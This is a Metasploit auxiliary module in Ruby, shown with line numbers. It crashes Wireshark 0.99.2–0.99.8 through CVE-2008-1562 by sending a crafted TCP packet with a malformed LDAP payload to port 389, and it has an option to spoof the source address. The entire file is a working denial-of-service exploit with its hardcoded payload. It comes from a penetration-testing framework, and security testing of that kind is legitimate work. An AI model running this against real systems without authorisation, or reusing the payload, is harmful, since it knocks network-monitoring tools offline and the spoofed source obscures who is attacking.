1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Capture
8
  include Msf::Auxiliary::Dos
9

10
  def initialize
11
    super(
12
      'Name' => 'Wireshark LDAP Dissector DOS',
13
      'Description' => %q{
14
        The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers
15
        to cause a denial of service (application crash) via a malformed packet.
16
      },
17
      'Author' => ['MC'],
18
      'License' => MSF_LICENSE,
19
      'References' => [
20
        [ 'CVE', '2008-1562' ],
21
        [ 'OSVDB', '43840' ],
22
      ],
23
      'DisclosureDate' => 'Mar 28 2008',
24
      'Notes' => {
25
        'Stability' => [CRASH_SERVICE_DOWN],
26
        'SideEffects' => [],
27
        'Reliability' => []
28
      }
29
    )
30

31
    register_options([
32
      OptInt.new('RPORT', [true, 'The destination port', 389]),
33
      OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
34
    ])
35

36
    deregister_options('FILTER', 'PCAPFILE')
37
  end
38

39
  def run
40
    open_pcap
41

42
    print_status("Sending malformed LDAP packet to #{rhost}")
43

44
    m = Rex::Text.rand_text_alpha_lower(3)
45

46
    p = PacketFu::TCPPacket.new
47
    p.ip_saddr = datastore['SHOST'] || Rex::Socket.source_address(rhost)
48
    p.ip_daddr = rhost
49
    p.tcp_ack = rand(0x100000000)
50
    p.tcp_flags.syn = 1
51
    p.tcp_flags.ack = 1
52
    p.tcp_dport = datastore['RPORT'].to_i
53
    p.tcp_win = 3072
54
    p.payload = "0O\002\002;\242cI\004\rdc=#{m},dc=#{m}\n\001\002\n\001\000\002\001\000\002\001\000\001\001\000\241'\243\016"
55
    p.recalc
56
    capture_sendto(p, rhost)
57

58
    close_pcap
59
  end
60
end
61

62